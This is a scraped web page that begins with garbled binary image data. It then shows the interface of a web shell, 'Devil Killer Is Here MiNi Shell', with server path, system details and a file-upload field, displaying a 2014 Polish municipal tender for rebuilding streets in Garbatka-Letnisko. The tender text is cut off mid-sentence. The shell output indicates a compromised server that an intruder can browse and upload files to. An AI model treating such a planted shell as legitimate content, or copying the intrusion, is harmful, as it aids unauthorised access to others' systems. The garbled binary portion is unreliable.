JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140702/221156-N-2014.html

<p class="kh_header"><b>Garbatka-Letnisko: Przebudowa ul. Spacerowej i ul. Krasickiego w Garbatce-Letnisko.</b><br>
<b>Numer ogłoszenia: 221156 - 2014; data zamieszczenia: 02.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Garbatka-Letnisko , ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko, woj. mazowieckie, tel. 48 6210194, 6210163 w. 22, faks 48 6210054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.garbatkaletnisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Spacerowej i ul. Krasickiego w Garbatce-Letnisko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem inwestycji jest przebudowa ul. Spacerowej i ul. Krasickiego w Garbatce-Letnisko, w skład której wchodzi m.in.: 1.1. ETAP I Na Etap I realizacji inwestycji składa się przebudowa całego odcinka ulicy Krasickiego wraz ze skrzyżowaniem z ulicą Spacerową. W ramach tego etapu wykonane zostaną także chodniki, organizacja ruchu oraz przebudowa oświetlenia ulicznego. Etap I obejmuje także korektę niwelety ulicy Spacerowej (nakładka na dł. 88 mb) pomiędzy ulicami Krasickiego i Bielawskiego. W ramach I Etapu wykonane zostaną m.in.: 1.1.1. Prace przygotowawcze, rozbiórkowe i ziemne Prace przygotowawcze obejmują prace pomiarowe tj. odtworzenie trasy i punktów wysokościowych, wytyczenie głównej osi ulic i innych elementów. W ramach prac rozbiórkowych zaplanowano odkrycie urządzeń podziemnych, rozbiórkę nawierzchni jezdni, chodników i krawężników oraz mechaniczne frezowanie nawierzchni. Roboty ziemne obejmować będą głównie wykopy powstałe przy wykonaniu koryta pod warstwy konstrukcyjne nawierzchni jezdni oraz ciągu pieszego. 1.1.2. Jezdnia ulicy Ulica Krasickiego zostanie wytyczona na podstawie określonych współrzędnych geodezyjnych. W planie ulica składa się z prostego odcinka. Jej początek usytuowany jest na granicy z obszarem Gminnego Ośrodka Wypoczynku Polanka. Ulica Krasickiego kończy się tuż za terenem nowo wybudowanego przedszkola Samorządowego. Ulicę Krasickiego przecina prostopadle ulica Spacerowa. Na całej długości ulicy Krasickiego, na obu odcinkach (sięgacz lewy i sięgacz prawy) zaprojektowano jezdnię o szerokości 5,5 m o półulicznym przekroju. Po stronie lewej zaprojektowano krawężnik wtopiony, dla właściwego odwodnienia jezdni. Projektowane parametry ulicy Krasickiego: - jezdni szerokość 5,5 m - krawężnik po prawej stronie, - ciąg pieszy szerokość 3,0 m zlokalizowany bezpośrednio przy krawężniku na lewym sięgaczu, oddzielony pasem zieleni na sięgaczu prawym. Profil podłużny ulicy dostosowany zostanie do obecnie istniejących zjazdów na posesje oraz niwelety sąsiednich ulic. W postaci łuków pionowych zaprojektowano pionowe załamania niwelety. Dla konieczności zapewnienia skutecznego odwodnienia ulicy, przyjęto przekrój poprzeczy jezdni na spadku jednostronnym 1,0 % Zaprojektowano także po stronie prawej krawężniki wystające - 10,0 cm oraz po stroni lewej krawężniki wtopione. Projektowana konstrukcja nawierzchni jezdni: - nawierzchnia jezdni z kostki betonowej szarej o grubości 8 cm, - górna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie grubość 8 cm (mieszanka sortowa 0-31,5 mm) - dolna warstwa podbudowy z tłucznia łamanego stabilizowanego mechanicznie grubość 15 cm (mieszanka sortowa 0-63,5 mm) - warstwa odsączająca z piasku o grubości 10 cm. 1.1.3. Projektowane chodniki i zjazdy Zaprojektowano tu jednostronne ciągi piesze po prawej stronie o szerokości 3,0 m. Na sięgaczu lewym w kierunku ośrodka wypoczynku, chodnik bezpośrednio przy jezdni. Na sięgaczu prawym w kierunku przedszkola, chodnik oddzielony od jezdni. Zjazdy zaprojektowano w miejscach obecnie istniejących. Zaprojektowano obrzeża betonowe na zakończeniach zjazdów. Projektowana konstrukcja chodników oraz zjazdów: - nawierzchnia z kostki betonowej kolorowej o grubości 6 cm, podsypka cementowo-piaskowa - podbudowa z tłucznia stabilizowanego mechanicznie o grubości 15 cm (mieszanka sortowana 0/31,5 mm) - warstwa odsączająca z piasku o grubości 10 cm. Obniżony krawężnik zamontowany zostanie na dojściach dla pieszych . Przy dojściach do przejść dla pieszych zaprojektowano także pas z elementów betonowych o szerokości 0,5 m tzw. płytka chodnikowa. Do oferty należy doliczyć jeden dodatkowy zjazd (na wysokości działki oznaczonej w projekcie budowlanym numerem ew. 3/1) nie objęty projektem budowlanym, a uwzględniony w przedmiarach załączonych do niniejszej SIWZ 1.1.4. Odwodnienie. Projektowane odwodnienie ulicy Krasickiego: - na sięgaczu lewym zaprojektowano spadek jednostronny na pobocze oraz spadek podłużny na ul. Spacerową (przełamanie spadków na skrzyżowaniu), - na sięgaczu prawym zaprojektowano spadek jednostronny do istniejącego rowu przydrożnego po lewej stronie, rów ten pełni role rowu chłonnego. 1.1.5.Oznakowanie. W ramach realizacji przedmiotowej inwestycji zaprojektowano nowe oznakowanie pionowe i poziome, głównie poprzez oznakowanie przejść dla pieszych (także oznakowanie poziome przejść) i skrzyżowania ulic Spacerowej i Krasickiego. 1.1.6.Oświetlenie. W ramach etapu zaprojektowano budowę nowego oświetlenia ulicznego zlokalizowanego po stronie prawej wzdłuż krawężnika oraz zaprojektowano analogiczne oświetlenie wzdłuż parkingu (przebudowa oświetlenia wg projektu branżowego stanowiącego załącznik do niniejszej SIWZ). Pop wykonaniu nowego oświetlenia należy zdemontować oprawy oświetleniowe na słupa NN zlokalizowane przy lewym sięgaczu. 1.2. ETAP II. Na Etap II składa się przebudowa ulicy Spacerowej na odcinku od km 0+009 do km 0+227 tj. od ulicy Kolejowej do skrzyżowania z ulicą Krasickiego wraz z parkingiem przy dawnym ośrodku zdrowia. W tym etapie ujęto również modernizację oświetlenia parkingu. W ramach Etapu II zostaną wykonane m.in.: 1.2.1.Roboty ziemne, rozbiórkowe i przygotowawcze. Roboty przygotowawcze polegać będą na wytyczeniu głównej osi ulicy Spacerowej i innych elementów oraz usunięciu zniszczonych krawężników, chodników i zjazdów, wykonane zostanie także korekcyjne frezowanie nawierzchni. Roboty ziemne będą stanowić głównie wykopy powstałe przy wykonaniu koryta pod warstwy konstrukcyjne nawierzchni jezdni, parkingu, chodników i zjazdów. 1.2.2. Jezdnia ulicy. Oś ulicy Spacerowej zostanie wyznaczona jako istniejącą oś jezdni bitumicznej. W ramach przebudowy tej ulicy przewidziano poszerzenie jezdni - na odcinku od ulicy Kolejowej do ulicy Krasickiego do szerokości 5,5 m (poszerzenie o 1,0 m) z poboczem tłuczniowym. Parametry ulicy: - jezdnia szer. 5,5 m z krawężnikiem po stronie lewej, - chodniki szer. 2,0 m bezpośrednio przy krawężniku po stronie lewej, - utwardzone tłuczniem pobocze od km 0 +009 do km 0+170 po stronie prawej. Konstrukcja nawierzchni: - nawierzchni bitumiczna warstwa ścieralna z betonu asfalt. AC11S50/70 gr. 4 cm, - nawierzchnia bitumiczna warstwa wiążąca z betonu asfalt AC16W50/70 gr. 4 cm, - podbudowa z tłucznia łamanego stabilizowanego mechanicznie (mieszanka sortowana 0-63,5 mm) gr. 20 cm, - warstwa odcinająca z gruntu stabilizowanego cementem o Rm+5,0Mpa gr. 10 cm 1.2.3. Chodniki i zjazdy Na tym odcinku ulicy Spacerowej zaprojektowano chodnik jednostronny szerokości 2,0 m bezpośrednio przy jezdni po stronie lewej. Zaprojektowano również chodniki i dojścia wzdłuż parkingu przy dawnym ośrodku zdrowia umożliwiające dojście do tego obiektu. Konstrukcja chodników i zjazdów: - nawierzchnia z kostki kolorowej gr. 6 cm (zjazdy gr 8 cm) na podsypce cementowo-piaskowej, - podbudowa z tłucznia stabilizowanego mechanicznie - mieszanka sortowana 0/31,5 mm gr. 15 cm, - warstwa odsączająca z piasku gr. 10 cm. Na dojściach do przejść dla pieszych zamontowany zostanie obniżony krawężnik oraz ułożony zostanie pas szerokości 0,5 m z elementów betonowych (płytka chodnikowa) z elementami wypukłymi sygnalizującymi dojście do przejścia dla pieszych. 1.2.4. Parking. W ramach przebudowy tej ulicy zaprojektowano wykonanie dodatkowych miejsc postojowych przed dawnym ośrodku zdrowia. Przewidziano miejsca postojowe dla samochodów osobowych dla parkowania prostopadłego do jezdni - łącznie siedemnaście stanowisk o wymiarach 4,5 x 2,5 oraz jedno stanowisko dla osób niepełnosprawnych o wymiarach 4,5 x 3,5 m zlokalizowane przy dojściu do pochylni prowadzącej do budynku dawnego ośrodka zdrowia. Konstrukcja parkingu: - nawierzchnia z kostki brukowej betonowej gr. 8 cm na podsypce cementowo-piaskowej, -podbudowa z tłucznia stabilizowanego mechanicznie - mieszanka sortowana 0/63,5 mm gr. 20 cm, - warstwa odcinająca z gruntu stabilizowanego cementem o Rm=5,0 Mpa gr. 10 cm. 1.2.5. Odwodnienie. Odwodnienie ulicy Spacerowej odbywać się będzie poprzez jej naturalne spadki podłużne skierowane ku końcom ulicy. 1.2.6. Oznakowanie. Zaprojektowano nowe oznakowanie pionowe. Wszystko wg zatwierdzonego i zaopiniowanego projektu stałej organizacji ruchu. 1.2.7.Przebudowa przyłącza gazowego W ramach tego Etapu przewidziano przebudowę przyłącza gazowego kolidującego z realizacją inwestycji zgodnie z projektem budowlanym - branża sanitarna. Do oferty należy doliczyć koszty przebudowy drugiego odcinka ziemnej instalacji gazowej wybudowanego od budynku zlokalizowanego przy Spacerowej 2A do skrzynki z układem redukcyjno-pomiarowym. Przebudowa drugiego odcinka stanowi jedynie następstwo przesunięcia układu redukcyjno-pomiarowego wzdłuż nowo zaprojektowanej linii ogrodzenia. Trasa planowanego do przebudowy drugiego odcinka przedstawiona został na inwentaryzacji przyłącza gazociągowego, stanowiącego załącznik do niniejszej SIWZ. Prace budowlane związane z przebudową przyłącza gazowego można zlecić do Rejonu Dystrybucji Gazu w Pionkach lub osobie z odpowiednimi uprawnieniami budowlanymi tj. posiadającego status KDU (Kwalifikowania Dostawy Usług) dla MSG Sp. z o.o. 2. Zamawiający zaleca przeprowadzenie wizytacji realizacji przedmiotu zamówienia, która ma na celu uzyskanie dodatkowych informacji potrzebnych do opracowania oferty i jej prawidłowej wyceny. Wizje w terenie wykonawca dokonuje na własny koszt. 3. Przedmiot zamówienia, należy wykonać zgodnie z Projektem Budowlanym (branża drogowa, elektryczna i sanitarna), Projektem stałej organizacji ruchu, Specyfikacją techniczną wykonania i odbioru robót, przedmiarami robót, warunkami technicznymi stanowiącymi integralną część SIWZ. 4. Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami i normatywami. 5. Zamawiający ma prawo zapoznania się z przebiegiem i postępem prac na każdym etapie realizacji zamówienia w terminie i w miejscu wskazanym przez Zamawiającego. 6. Wykonawca oświadcza, że posiada niezbędne uprawnienia do wykonywania przedmiotu zamówienia i zapewnia osoby posiadające stosowne uprawnienia. 7. Wykonawca nie może bez zgody Zamawiającego przekazać praw i obowiązków, wynikających z umowy w całości na osoby trzecie. Wykonawca odpowiada bez ograniczeń za prace wykonane przez podwykonawców, niezbędne do realizacji przedmiotu umowy. 8. Przekazanie placu budowy nastąpi w terminie w terminie do 14 dni kalendarzowych od dnia podpisania umowy. 9. O rozpoczęciu robót Wykonawca winien powiadomić właścicieli istniejącego w rejonie budowy uzbrojenia podziemnego w celu zapewnienia z ich strony ewentualnego nadzoru technicznego. Wykonawca we własnym zakresie pokryje koszty nadzoru właścicieli sieci wg uzgodnień. 10. Przy realizacji umowy Wykonawca zobowiązuje się stosować materiały i wyroby dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z ustawą Prawo budowlane wraz z dokumentami potwierdzającymi ich jakość. Wykonawca przed zastosowaniem jakichkolwiek materiałów przedstawi inspektorowi nadzoru źródła ich pochodzenia, atesty lub aprobaty techniczne, certyfikaty, deklaracje zgodności, świadectwa badań laboratoryjnych oraz świadectwa dopuszczenia do stosowania w budownictwie. Każdy rodzaj robót w których znajdują się materiały nie odpowiadające normom i nie zaakceptowane przez Zamawiającego, Wykonawca wykonuje na własne ryzyko, licząc się z jego nie przyjęciem i nie zapłaceniem. 11. wykonania i uzgodnienia we własnym zakresie i na swój koszt projektu organizacji ruchu na czas budowy i dokonania oznakowania w zakresie niezbędnym do wykonania robót będących przedmiotem zamówienia. 12. montażu na swój koszt słupów do znaków drogowych, mocowania tablic znaków drogowych - zgodnie z projektem organizacji ruchu. 13. uzyskania na podstawie udzielonego mu pełnomocnictwa w imieniu Gminy Garbatka-Letnisko we własnym zakresie i na własny koszt od właściwego zarządu drogi zezwalającą na zajęcie pasa drogowego. Koszty związane z zajęciem pasa drogowego na czas wykonywania robót należy uwzględnić w cenie oferty. 14. O rozpoczęciu robót należy powiadomić instytucje branżowe, właścicieli, zarządców, użytkowników nieruchomości przez które lub na których będą prowadzone prace konserwacyjne i utrzymaniowe. 15. W trakcie realizacji zadania Wykonawca: a) Zabezpieczy i oznakuje teren budowy zgodnie z przepisami, b) Dokona urządzenia placu budowy i poniesie koszty utrzymania zaplecza budowy, c) Wykona badania i ekspertyzy na życzenie Zamawiającego lub Inspektora Nadzoru, d) Zapewni ochronę terenów przyległych do placu budowy i poniesie odpowiedzialność cywilną za ewentualne szkody wynikłe z tytułu prowadzonych prac wobec osób trzecich, e) Zapewni obsługę geodezyjną na własny koszt. f) Odtworzy stan pierwotny miejsc uszkodzonych w trakcie robót. g) Sporządzi dokumentację geodezyjną powykonawczą, która w 2 egz. zostanie przekazana Zamawiającemu. 16. Wymagany minimalny okres udzielanej gwarancji na przedmiot zamówienia (tj. na wszystkie wykonane roboty, zabudowane materiały i urządzenia) wynosi 36 miesięcy, licząc od dnia podpisania protokołu końcowego odbioru przedmiotu zamówienia. 17. Zgodnie z art. 30 ust. 4 ustawy Zamawiający dopuszcza rozwiązania równoważne opisywanym. Zamawiający informuje, że ilekroć przedmiot zamówienia określony w SIWZ i w załącznikach do SIWZ opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia, dopuszcza się rozwiązania równoważne z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia), będą posiadały parametry techniczne nie gorsze niż wymagane przez zamawiającego, posiadały wymagane atesty, spełniały wymagane normy. Obowiązek jednoznacznego wykazania ich równoważności, w stosunku do przyjętych w założeniach projektowych, spoczywa na Wykonawcy, zgodnie z treścią art. 30 ust. 5 ustawy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stosownie do art. 67 ust.1 pkt 6. Przewidywana wartość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.32.23-8, 45.23.31.00-0, 45.23.30.00-9, 45.34.20.00-6, 45.11.12.91-4, 45.23.14.00-9, 45.31.51.00-9, 45.31.43.10-7, 31.52.72.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: 15 000,00 PLN (słownie złotych: piętnaście tysięcy 00/100). Wadium wnosi się przed upływem terminu składania ofert. Wadium może być wniesione w jednej lub kilku następujących formach:a)pieniądzu,b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)gwarancjach bankowych,d)gwarancjach ubezpieczeniowych,e)poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.). 4.Dowód wniesienia wadium należy załączyć do oferty. Uwaga: W przypadku wniesienia wadium w pieniądzu, wykonawca winien załączyć do oferty oryginał lub kopię potwierdzenia wykonania przelewu wadium poświadczoną za zgodność z oryginałem przez Wykonawcę. Dla pozostałych form wniesienia wadium wymagane jest złożenie wraz z ofertą dokumentu w oryginale, a dodatkowo do oferty należy dołączyć (spiąć z ofertą) kopię składanego dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę w sposób opisany w rozdz. XV pkt 1 lit. i) siwz. 5.Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto: Bank Spółdzielczy Zwoleń Ooddział Garbatka Nr 67 9157 0002 0040 0400 0257 0019 6.Wadium musi obejmować cały okres związania ofertą. 7.W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy: 1)Nazwę dającego zlecenie(Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib, 2)Określenie wierzytelności, która ma być zabezpieczona gwarancją,3)Kwotę gwarancji,4)Termin ważności gwarancji, 5)Zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: a)Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub b)Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub c)Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.6)Zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, i nie udowodnił, iż wynika to z przyczyn nieleżących po jego stronie 7)Gwarancja powinna być nieodwołalna i bezwarunkowa. 8)Wszelkie spory dotyczące gwarancji podlegają rozstrzygnięciu zgodnie z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego. 9)Jednocześnie Zamawiający wymaga, aby okres ważności wniesionego wadium nie był krótszy niż okres związania ofertą. Postanowienia wskazane powyżej stosuje się odpowiednio do poręczeń. 8.Zamawiający zwróci niezwłocznie wadium, na pisemny wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 9.Zamawiający zwróci wadium: a) wszystkim Wykonawcom, niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 11; b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. Uwaga: Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 7 lit. a), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 10.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 12.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, b) nie wniesie zabezpieczenia należytego wykonania umowy, c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 12. Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie 
o spełnianiu warunków (zał. Nr 2), o którym mowa w  rozdz. IX  pkt 2 lit. a);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, 
że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
b.1) co najmniej 1 robotę budowlaną o wartości minimum 300.000,00 zł brutto (słownie zł: trzysta tysięcy 00/100) polegającą na budowie, przebudowie, remoncie drogi publicznej o nawierzchni z betonu asfaltowego lub kostki brukowej zrealizowaną w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończoną;
b.2)  co najmniej 1 robotę budowlaną o wartości minimum 40.000,00 zł brutto (słownie zł: czterdzieści tysięcy 00/100) polegającą na budowie, przebudowie, remoncie oświetlenia ulicznego zrealizowaną w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończoną;

Wykonawca, celem wykazania spełnienia określonych przez Zamawiającego warunków dotyczących posiadania wiedzy i doświadczenia może wykazać wykonanie określonych wyżej robót budowlanych w ramach jednego lub więcej zamówień obejmujących wyspecyfikowany powyżej zakres robót (z wyszczególnieniem żądanych przez Zamawiającego wartości)
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego wykazu robót budowlanych wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, 
